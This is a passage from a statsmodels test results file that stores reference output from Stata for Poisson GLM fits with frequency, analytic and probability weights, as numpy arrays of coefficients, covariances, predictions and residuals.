hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
67658b1b18cce3f2aa9925847c342d2185f76e2d
| 105,906
|
py
|
Python
|
statsmodels/genmod/tests/results/results_glm_poisson_weights.py
|
nikhase/statsmodels
|
e1822d4513f442002816bb898ca5794785f35c32
|
[
"BSD-3-Clause"
] | 15
|
2015-03-03T09:47:42.000Z
|
2022-01-05T18:28:31.000Z
|
statsmodels/genmod/tests/results/results_glm_poisson_weights.py
|
nikhase/statsmodels
|
e1822d4513f442002816bb898ca5794785f35c32
|
[
"BSD-3-Clause"
] | 7
|
2015-11-20T08:33:04.000Z
|
2020-07-24T19:34:39.000Z
|
statsmodels/genmod/tests/results/results_glm_poisson_weights.py
|
nikhase/statsmodels
|
e1822d4513f442002816bb898ca5794785f35c32
|
[
"BSD-3-Clause"
] | 14
|
2015-01-06T22:08:34.000Z
|
2021-01-01T16:33:23.000Z
|
import numpy as np
est = dict(
deviance = 18.59164098607571,
dispers = 1.859164098607571,
deviance_s = 18.59164098607571,
dispers_s = 1.859164098607571,
deviance_p = 24.75374834715614,
dispers_p = 2.475374834715614,
deviance_ps = 24.75374834715614,
dispers_ps = 2.475374834715614,
bic = -9.740492454486454,
nbml = 0,
N = 17,
ic = 3,
k = 7,
k_eq = 1,
k_dv = 1,
converged = 1,
k_autoCns = 0,
ll = -31.92732830809848,
chi2 = 128.8021169250575,
p = 2.29729497374e-25,
rc = 0,
aic = 4.579685683305704,
rank = 7,
canonical = 1,
power = 0,
df_m = 6,
df = 10,
vf = 1,
phi = 1,
k_eq_model = 0,
properties = "b V",
depvar = "executions",
which = "max",
technique = "nr",
singularHmethod = "m-marquardt",
ml_method = "e2",
crittype = "log likelihood",
user = "glim_lf",
title = "Generalized linear models",
opt = "moptimize",
chi2type = "Wald",
link = "glim_l03",
varfunc = "glim_v3",
m = "1",
a = "1",
oim = "oim",
opt1 = "ML",
varfuncf = "u",
varfunct = "Poisson",
linkf = "ln(u)",
linkt = "Log",
vce = "oim",
vcetype = "OIM",
hac_lag = "15",
marginsok = "default",
marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
predict = "glim_p",
cmd = "glm",
cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree, family(poisson)",
)
params_table = np.array([
.00026110166569, .00005187148786, 5.0336259178483, 4.812884279e-07,
.00015943541766, .00036276791372, np.nan, 1.9599639845401,
0, .07781804809828, .07940260798777, .98004398180811,
.32706440886796, -.0778082038363, .23344430003287, np.nan,
1.9599639845401, 0, -.09493110013466, .02291930335216,
-4.1419714498302, .00003443332141, -.13985210925565, -.05001009101367,
np.nan, 1.9599639845401, 0, .29693462055586,
.43751760764129, .67868038993144, .49734039404176, -.5605841330232,
1.1544533741349, np.nan, 1.9599639845401, 0,
2.3011832004524, .42838381728481, 5.3717790159251, 7.796361708e-08,
1.4615663470144, 3.1408000538904, np.nan, 1.9599639845401,
0, -18.722067603077, 4.2839791307242, -4.3702518223781,
.00001241033322, -27.118512409818, -10.325622796337, np.nan,
1.9599639845401, 0, -6.8014789919532, 4.146873025502,
-1.6401464308471, .10097472438129, -14.929200770398, 1.3262427864914,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov = np.array([
2.690651253e-09, 1.942168909e-06, 9.445812833e-08, 4.703695025e-06,
-6.082922480e-06, -.00008108248895, -.00013492774575, 1.942168909e-06,
.00630477415526, .00017467012687, .00328093520848, -.01768604570302,
.11117887243846, -.19441636422025, 9.445812833e-08, .00017467012687,
.00052529446615, -.00313545508833, -.00516707569472, -.03253594627601,
.01688876616272, 4.703695025e-06, .00328093520848, -.00313545508833,
.19142165699616, -.00179497953339, .30391667530759, -1.4489146451821,
-6.082922480e-06, -.01768604570302, -.00516707569472, -.00179497953339,
.18351269491151, .3016848477378, .36484063612427, -.00008108248895,
.11117887243846, -.03253594627601, .30391667530759, .3016848477378,
18.352477192481, -4.0741043266703, -.00013492774575, -.19441636422025,
.01688876616272, -1.4489146451821, .36484063612427, -4.0741043266703,
17.196555889636]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
infocrit = np.array([
17, np.nan, -31.927328308098, 7,
77.854656616197, 83.68715002459])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
predicted = np.array([
35.226364135742, .16681243479252, .98022246360779, 8.1965742111206,
.33106967806816, .89840310811996, 1.3118965625763, .29945519566536,
.11764223873615, 3.6862981319427, .35516858100891, .46500706672668,
2.0823004245758, .3434439599514, .24561515450478, 1.0650315284729,
.62310123443604, .41350400447845, 1.9260421991348, .40797635912895,
.32057955861092, 2.4171404838562, .36215576529503, .31702440977097,
1.8473218679428, .3869916498661, .27665960788727, 2.8643238544464,
.43869277834892, .55124300718307, 3.1211984157562, .44224792718887,
.61045408248901, 3.338207244873, .42789322137833, .61120104789734,
2.5269968509674, .42458593845367, .45554983615875, .89725440740585,
.59187793731689, .31432569026947, .97933322191238, .37813624739647,
.14003194868565, .53462094068527, .38791963458061, .08045063912868,
1.9790935516357, .31954729557037, .20208616554737]).reshape(17,3)
predicted_colnames = 'predict_mu predict_linpred_std predict_hat'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
resids = np.array([
1.773634314537, 1.773634314537, .29638093709946, .29637759923935,
.2988341152668, .05034962296486, .80342543125153, .80342543125153,
.27623143792152, .27622014284134, .28062695264816, .09801965206861,
4.6881031990051, 4.6881031990051, 3.0157172679901, 2.977787733078,
4.0930528640747, 3.5735311508179, .31370183825493, .31370183825493,
.1611547768116, .16114975512028, .16338862478733, .08509942144156,
.91769951581955, .91769951581955, .59656941890717, .59618371725082,
.63595855236053, .44071426987648, .9349684715271, .9349684715271,
.80822360515594, .80661898851395, .90597397089005, .87787866592407,
.07395775616169, .07395775616169, .05295527353883, .05295492336154,
.05329062789679, .03839882463217, -.41714036464691, -.41714036464691,
-.27668312191963, -.27663832902908, -.2683065533638, -.17257598042488,
-.84732186794281, -.84732186794281, -.68459099531174, -.68349820375443,
-.6234148144722, -.458675801754, -1.8643238544464, -1.8643238544464,
-1.2799508571625, -1.274356007576, -1.1015654802322, -.65087747573853,
-2.1211984157562, -2.1211984157562, -1.4092296361923, -1.4021278619766,
-1.2006615400314, -.67961025238037, -2.338207244873, -2.338207244873,
-1.5136297941208, -1.5051733255386, -1.2797535657883, -.70043802261353,
-1.5269968509674, -1.5269968509674, -1.0992211103439, -1.0954134464264,
-.9605849981308, -.60427337884903, .10274560004473, .10274560004473,
.10649761557579, .1064917370677, .10846894979477, .11451110988855,
.02066676132381, .02066676132381, .02081091701984, .02081087417901,
.02088368684053, .02110289037228, .46537905931473, .46537905931473,
.56824368238449, .56713002920151, .63647866249084, .87048417329788,
-.97909361124039, -.97909361124039, -.77151334285736, -.77000600099564,
-.69597083330154, -.49471819400787]).reshape(17,6)
resids_colnames = 'score_factor resid_response resid_anscombe resid_deviance resid_pearson resid_working'.split()
resids_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
class Bunch(dict):
def __init__(self, **kw):
dict.__init__(self, kw)
self.__dict__ = self
for i,att in enumerate(['params', 'bse', 'tvalues', 'pvalues']):
self[att] = self.params_table[:,i]
results_poisson_none_nonrobust = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
resids=resids,
resids_colnames=resids_colnames,
resids_rownames=resids_rownames,
**est
)
est = dict(
deviance = 23.34969514421719,
dispers = .8980651978545075,
deviance_s = 23.34969514421719,
dispers_s = .8980651978545075,
deviance_p = 30.06164170990202,
dispers_p = 1.156216988842385,
deviance_ps = 30.06164170990202,
dispers_ps = 1.156216988842385,
bic = -67.5595014539113,
nbml = 0,
N = 33,
ic = 3,
k = 7,
k_eq = 1,
k_dv = 1,
converged = 1,
k_autoCns = 0,
ll = -52.96941847346162,
chi2 = 183.6836771894393,
p = 5.59891844113e-37,
rc = 0,
aic = 3.634510210512826,
rank = 7,
canonical = 1,
power = 0,
df_m = 6,
df = 26,
vf = 1,
phi = 1,
k_eq_model = 0,
properties = "b V",
depvar = "executions",
which = "max",
technique = "nr",
singularHmethod = "m-marquardt",
ml_method = "e2",
crittype = "log likelihood",
user = "glim_lf",
title = "Generalized linear models",
opt = "moptimize",
chi2type = "Wald",
wtype = "fweight",
wexp = "= fweight",
link = "glim_l03",
varfunc = "glim_v3",
m = "1",
a = "1",
oim = "oim",
opt1 = "ML",
varfuncf = "u",
varfunct = "Poisson",
linkf = "ln(u)",
linkt = "Log",
vce = "oim",
vcetype = "OIM",
hac_lag = "15",
marginsok = "default",
marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
predict = "glim_p",
cmd = "glm",
cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [fweight=fweight], family(poisson)",
)
params_table = np.array([
.00025343868829, .00004015414514, 6.3116444744157, 2.760858933e-10,
.00017473800999, .00033213936659, np.nan, 1.9599639845401,
0, .09081422305585, .06472607217881, 1.4030547505642,
.16060051303473, -.03604654727537, .21767499338706, np.nan,
1.9599639845401, 0, -.09416451429381, .01795769655821,
-5.2436855689475, 1.574003474e-07, -.12936095279319, -.05896807579442,
np.nan, 1.9599639845401, 0, .27652273809506,
.38626128010796, .7158955669017, .47405583598111, -.48053545953887,
1.033580935729, np.nan, 1.9599639845401, 0,
2.239890838384, .36339399714255, 6.1638080320445, 7.101602988e-10,
1.5276516917866, 2.9521299849815, np.nan, 1.9599639845401,
0, -18.842583191417, 3.736940161486, -5.0422491067996,
4.600917913e-07, -26.16685132031, -11.518315062523, np.nan,
1.9599639845401, 0, -6.5630017977416, 3.2352486362722,
-2.0285927097411, .04249979172538, -12.903972605867, -.22203098961573,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov = np.array([
1.612355372e-09, 1.270985149e-06, 8.789752394e-08, -1.636449642e-07,
-3.213686689e-06, -.00005643188411, -.00006199883309, 1.270985149e-06,
.0041894644197, .00016567874308, -.00066453618021, -.00943379587945,
.07218307550995, -.11262571631082, 8.789752394e-08, .00016567874308,
.00032247886568, -.00355795369216, -.00391377556228, -.01880905186772,
.01900717143416, -1.636449642e-07, -.00066453618021, -.00355795369216,
.14919777651064, .02481983169552, .26952997380446, -.95915288407306,
-3.213686689e-06, -.00943379587945, -.00391377556228, .02481983169552,
.13205519715924, .44364186152042, -.0298149336078, -.00005643188411,
.07218307550995, -.01880905186772, .26952997380446, .44364186152042,
13.964721770527, -3.6510403528048, -.00006199883309, -.11262571631082,
.01900717143416, -.95915288407306, -.0298149336078, -3.6510403528048,
10.466833738501]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
infocrit = np.array([
33, np.nan, -52.969418473462, 7,
119.93883694692, 130.41438987719])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
predicted = np.array([
34.815238952637, .16658315062523, .96612107753754, 7.3026847839355,
.32757967710495, .78363972902298, 1.2540435791016, .26076200604439,
.08527097851038, 3.9734709262848, .24942673742771, .24720433354378,
2.0739872455597, .24682784080505, .12635557353497, 1.1471545696259,
.45427960157394, .23673823475838, 1.7763512134552, .27608770132065,
.13540133833885, 2.2698366641998, .25641229748726, .1492355465889,
1.6349502801895, .27634221315384, .12485299259424, 2.7504913806915,
.39550569653511, .43024495244026, 2.862185716629, .39729079604149,
.45176732540131, 3.5617923736572, .39150056242943, .54592549800873,
2.6135795116425, .29556328058243, .22831618785858, .775799036026,
.40655690431595, .12823067605495, .93375068902969, .29390665888786,
.08065843582153, .56681954860687, .28863781690598, .04722274839878,
1.8914022445679, .21889741718769, .09062857925892]).reshape(17,3)
predicted_colnames = 'predict_mu predict_linpred_std predict_hat'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
resids = np.array([
2.1847612857819, 2.1847612857819, .36650228500366, .36649596691132,
.3702706694603, .06275302171707, 1.6973150968552, 1.6973150968552,
.60597640275955, .60585051774979, .62808901071548, .23242343962193,
4.7459564208984, 4.7459564208984, 3.0897438526154, 3.0483965873718,
4.2380628585815, 3.7845225334167, .02652905881405, .02652905881405,
.01329397037625, .01329396758229, .01330873556435, .00667654490098,
.92601269483566, .92601269483566, .60273587703705, .60233747959137,
.64300429821014, .44648909568787, .8528453707695, .8528453707695,
.72065913677216, .71955502033234, .7962681055069, .7434441447258,
.22364875674248, .22364875674248, .16446639597416, .16445553302765,
.16780391335487, .12590345740318, -.26983660459518, -.26983660459518,
-.1828535348177, -.18284019827843, -.1791032999754, -.11887931078672,
-.63495022058487, -.63495022058487, -.53598040342331, -.53542107343674,
-.49657794833183, -.38836058974266, -1.7504912614822, -1.7504912614822,
-1.2204585075378, -1.2154930830002, -1.0554916858673, -.63642859458923,
-1.862185716629, -1.862185716629, -1.2788465023041, -1.2732635736465,
-1.1007128953934, -.65061664581299, -2.5617923736572, -2.5617923736572,
-1.617108464241, -1.6071890592575, -1.3574055433273, -.71924245357513,
-1.6135795116425, -1.6135795116425, -1.1469231843948, -1.1426799297333,
-.99809640645981, -.61738300323486, .22420094907284, .22420094907284,
.24363535642624, .24356025457382, .25454398989677, .28899359703064,
.06624934077263, .06624934077263, .06777309626341, .06777160614729,
.06855925172567, .07094971090555, .43318045139313, .43318045139313,
.51954871416092, .51871728897095, .57536894083023, .76422989368439,
-.89140218496323, -.89140218496323, -.7140833735466, -.7128586769104,
-.64815932512283, -.47129172086716]).reshape(17,6)
resids_colnames = 'score_factor resid_response resid_anscombe resid_deviance resid_pearson resid_working'.split()
resids_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
results_poisson_fweight_nonrobust = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
resids=resids,
resids_colnames=resids_colnames,
resids_rownames=resids_rownames,
**est
)
est = dict(
deviance = 12.02863083186947,
dispers = 1.202863083186947,
deviance_s = 12.02863083186947,
dispers_s = 1.202863083186947,
deviance_p = 15.48630027479802,
dispers_p = 1.548630027479802,
deviance_ps = 15.48630027479802,
dispers_ps = 1.548630027479802,
bic = -16.30350260869269,
nbml = 0,
N = 17,
ic = 3,
k = 7,
k_eq = 1,
k_dv = 1,
converged = 1,
k_autoCns = 0,
ll = -27.28727618329841,
chi2 = 94.62492461274286,
p = 3.30927661191e-18,
rc = 0,
aic = 4.033797198035106,
rank = 7,
canonical = 1,
power = 0,
df_m = 6,
df = 10,
vf = 1,
phi = 1,
k_eq_model = 0,
properties = "b V",
depvar = "executions",
which = "max",
technique = "nr",
singularHmethod = "m-marquardt",
ml_method = "e2",
crittype = "log likelihood",
user = "glim_lf",
title = "Generalized linear models",
opt = "moptimize",
chi2type = "Wald",
wtype = "aweight",
wexp = "= fweight",
link = "glim_l03",
varfunc = "glim_v3",
m = "1",
a = "1",
oim = "oim",
opt1 = "ML",
varfuncf = "u",
varfunct = "Poisson",
linkf = "ln(u)",
linkt = "Log",
vce = "oim",
vcetype = "OIM",
hac_lag = "15",
marginsok = "default",
marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
predict = "glim_p",
cmd = "glm",
cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [aweight=fweight], family(poisson)",
)
params_table = np.array([
.00025343868829, .00005594520811, 4.5301232557793, 5.894928560e-06,
.00014378809529, .00036308928129, np.nan, 1.9599639845401,
0, .09081422305585, .09018031800722, 1.0070293059798,
.31392069129295, -.08593595235267, .26756439846436, np.nan,
1.9599639845401, 0, -.09416451429381, .02501975991718,
-3.7636058301716, .00016748080115, -.14320234263332, -.04512668595429,
np.nan, 1.9599639845401, 0, .27652273809507,
.53816281293549, .51382728692594, .60737274844619, -.77825699307725,
1.3313024692674, np.nan, 1.9599639845401, 0,
2.239890838384, .50630271729905, 4.424015044464, 9.688326910e-06,
1.2475557472031, 3.2322259295649, np.nan, 1.9599639845401,
0, -18.842583191417, 5.2065333302747, -3.6190267105084,
.00029571311817, -29.047201003062, -8.6379653797707, np.nan,
1.9599639845401, 0, -6.5630017977417, 4.5075460479893,
-1.4560032727052, .14539171490364, -15.397629710457, 2.2716261149733,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov = np.array([
3.129866310e-09, 2.467206465e-06, 1.706246053e-07, -3.176637541e-07,
-6.238332985e-06, -.00010954424563, -.000120350676, 2.467206465e-06,
.00813248975588, .00032161167774, -.00128998199687, -.01831266258952,
.14012008775466, -.21862639048575, 1.706246053e-07, .00032161167774,
.00062598838631, -.00690661599067, -.00759732903266, -.03651168891971,
.03689627396044, -3.176637541e-07, -.00128998199687, -.00690661599067,
.28961921322663, .04817967329131, .52320524326798, -1.8618850102603,
-6.238332985e-06, -.01831266258952, -.00759732903266, .04817967329131,
.2563424415444, .86118714295143, -.05787604759173, -.00010954424563,
.14012008775466, -.03651168891971, .52320524326798, .86118714295143,
27.107989319261, -7.0873136260377, -.000120350676, -.21862639048575,
.03689627396044, -1.8618850102603, -.05787604759173, -7.0873136260377,
20.317971374744]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
infocrit = np.array([
17, np.nan, -27.287276183298, 7,
68.574552366597, 74.40704577499])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
predicted = np.array([
34.815238952637, .23209382593632, 1.8754115104675, 7.3026847839355,
.45640400052071, 1.521183013916, 1.2540435791016, .36330956220627,
.16552601754665, 3.9734709262848, .34751656651497, .47986721992493,
2.0739872455597, .34389564394951, .2452784627676, 1.1471545696259,
.63293009996414, .45955070853233, 1.7763512134552, .38466224074364,
.2628378868103, 2.2698366641998, .35724925994873, .28969252109528,
1.6349502801895, .38501682877541, .24236169457436, 2.7504913806915,
.55104273557663, .83518141508102, 2.862185716629, .55352979898453,
.87696009874344, 3.5617923736572, .54546248912811, 1.0597376823425,
2.6135795116425, .41179683804512, .44320201873779, .775799036026,
.5664399266243, .24891836941242, .93375068902969, .40948873758316,
.15657225251198, .56681954860687, .40214782953262, .09166768193245,
1.8914022445679, .30498126149178, .17592607438564]).reshape(17,3)
predicted_colnames = 'predict_mu predict_linpred_std predict_hat'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
resids = np.array([
2.1847612857819, 2.1847612857819, .36650228500366, .36649596691132,
.3702706694603, .06275302171707, 1.6973150968552, 1.6973150968552,
.60597640275955, .60585051774979, .62808901071548, .23242343962193,
4.7459564208984, 4.7459564208984, 3.0897438526154, 3.0483965873718,
4.2380628585815, 3.7845225334167, .02652905881405, .02652905881405,
.01329397037625, .01329396758229, .01330873556435, .00667654490098,
.92601269483566, .92601269483566, .60273587703705, .60233747959137,
.64300429821014, .44648909568787, .8528453707695, .8528453707695,
.72065913677216, .71955502033234, .7962681055069, .7434441447258,
.22364875674248, .22364875674248, .16446639597416, .16445553302765,
.16780391335487, .12590345740318, -.26983660459518, -.26983660459518,
-.1828535348177, -.18284019827843, -.1791032999754, -.11887931078672,
-.63495022058487, -.63495022058487, -.53598040342331, -.53542107343674,
-.49657794833183, -.38836058974266, -1.7504912614822, -1.7504912614822,
-1.2204585075378, -1.2154930830002, -1.0554916858673, -.63642859458923,
-1.862185716629, -1.862185716629, -1.2788465023041, -1.2732635736465,
-1.1007128953934, -.65061664581299, -2.5617923736572, -2.5617923736572,
-1.617108464241, -1.6071890592575, -1.3574055433273, -.71924245357513,
-1.6135795116425, -1.6135795116425, -1.1469231843948, -1.1426799297333,
-.99809640645981, -.61738300323486, .22420094907284, .22420094907284,
.24363535642624, .24356025457382, .25454398989677, .28899359703064,
.06624934077263, .06624934077263, .06777309626341, .06777160614729,
.06855925172567, .07094971090555, .43318045139313, .43318045139313,
.51954871416092, .51871728897095, .57536894083023, .76422989368439,
-.89140218496323, -.89140218496323, -.7140833735466, -.7128586769104,
-.64815932512283, -.47129172086716]).reshape(17,6)
resids_colnames = 'score_factor resid_response resid_anscombe resid_deviance resid_pearson resid_working'.split()
resids_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
results_poisson_aweight_nonrobust = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
resids=resids,
resids_colnames=resids_colnames,
resids_rownames=resids_rownames,
**est
)
est = dict(
deviance = 23.34969514421719,
dispers = 2.33496951442172,
deviance_s = 23.34969514421719,
dispers_s = 2.33496951442172,
deviance_p = 30.06164170990202,
dispers_p = 3.006164170990202,
deviance_ps = 30.06164170990202,
dispers_ps = 3.006164170990202,
bic = -4.982438296344967,
nbml = 0,
N = 17,
ic = 3,
k = 7,
k_eq = 1,
k_dv = 1,
converged = 1,
k_autoCns = 0,
ll = -52.96941847346162,
chi2 = 356.6637749656061,
p = 5.72458312679e-74,
rc = 0,
aic = 7.055225702760191,
rank = 7,
canonical = 1,
power = 0,
df_m = 6,
df = 10,
vf = 1,
phi = 1,
k_eq_model = 0,
properties = "b V",
depvar = "executions",
which = "max",
technique = "nr",
singularHmethod = "m-marquardt",
ml_method = "e2",
crittype = "log pseudolikelihood",
user = "glim_lf",
title = "Generalized linear models",
opt = "moptimize",
chi2type = "Wald",
wtype = "pweight",
wexp = "= fweight",
link = "glim_l03",
varfunc = "glim_v3",
m = "1",
a = "1",
oim = "oim",
opt1 = "ML",
varfuncf = "u",
varfunct = "Poisson",
linkf = "ln(u)",
linkt = "Log",
vcetype = "Robust",
hac_lag = "15",
marginsok = "default",
marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
predict = "glim_p",
cmd = "glm",
cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [pweight=fweight], family(poisson)",
)
params_table = np.array([
.00025343868829, .0000298866597, 8.4799937786829, 2.252059827e-17,
.00019486191167, .00031201546491, np.nan, 1.9599639845401,
0, .09081422305585, .08414617969117, 1.0792435662456,
.28047916301946, -.07410925857549, .25573770468718, np.nan,
1.9599639845401, 0, -.09416451429381, .01946961498728,
-4.8364856909253, 1.321547815e-06, -.13232425846174, -.05600477012587,
np.nan, 1.9599639845401, 0, .27652273809506,
.36112179485191, .76573261995571, .44383541350407, -.43126297384714,
.98430845003726, np.nan, 1.9599639845401, 0,
2.239890838384, .43098853454849, 5.1971007551989, 2.024206636e-07,
1.3951688329193, 3.0846128438487, np.nan, 1.9599639845401,
0, -18.842583191417, 4.5147658917489, -4.1735460139479,
.00002998950578, -27.691361737874, -9.9938046449589, np.nan,
1.9599639845401, 0, -6.5630017977416, 3.3999612612355,
-1.930316639948, .0535676165153, -13.226803418595, .10079982311137,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov = np.array([
